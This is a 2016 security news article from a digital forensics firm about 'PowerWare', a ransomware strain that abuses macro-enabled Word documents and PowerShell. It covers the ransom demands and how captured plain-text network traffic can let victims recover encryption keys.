March 30, 2016 by

Cybercriminals Are Using Microsoft PowerShell to Create Ransomware

Cybercriminals are now targeting healthcare firms, enterprises and even hospitals to launch attacks with a strain of ransomware created using Microsoft’s PowerShell scripting language used for system administration.

Security researchers from security firm Carbon Black have discovered a strain of ransomware that targeted a healthcare organization using Microsoft’s PowerShell scripting language. The ransomware malware was unsuccessful in its email phishing campaign.

Dubbed ‘PowerWare’ by the security researchers, it is a newly discovered strain of ransomware malware that targets its victims with a macro-enabled Microsoft Word document.

The means to using PowerShell to obtain and then execute the malicious code meant that the ransomware could avoid writing new files to disk. Instead, the ransomware was written to blend in with legitimate activity in an operating system, making it harder to detect.

As an ever-increasing menace, normal ransomware variants usually install malicious files onto the systems which can now be easier to detect, as opposed to the new strain of PowerWare ransomware.

While the code is routinely simple, security researchers discovered that PowerWare takes a unique and yet novel approach to ransomware.

The researchers discovered that PowerWare was delivered through a Microsoft Word document that was macro-enabled to then launch two instances of PowerShell.

In what attests to the theory that malware authors are thinking out of the box to make their products harder to detect and kill, one of the two instances downloads the ransomware script on its own. The other uses this script as input to then run the malicious code in order to encrypt files on the targeted system.  The strain then behaves like any other form of ransomware, by demanding a ransom payment in return for a decryption key to release the files.

In this case, PowerWare initially demands a ransom of $500. If it goes unpaid after two weeks, the ransom demand increases to $1000.

Researchers from Carbon Black also revealed that organizations that have the security infrastructure in place for a full packet capture would be able to recover the encryption keys.

They also discovered that a strain of PowerWare ransomware, when discovered, calls upon its command and control servers over a plain-text protocol, leaving the traffic to be easily observed.

Organizations would then simply have to identify the correct domain and IP range from the network traffic to retrieve the encryption key, making the recovery process simpler.

Image credit: imgur

About the author

Image of Author

LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients’ engagements experience while providing a strategic and integrated array of services to minimum risk and disruption while protecting your brand.

Related articles

Microsoft’s PowerShell is Being Abused by Malware Authors

Microsoft Powershell, the software giant’s prominent scripting language that is now the...

Read more arrow_forward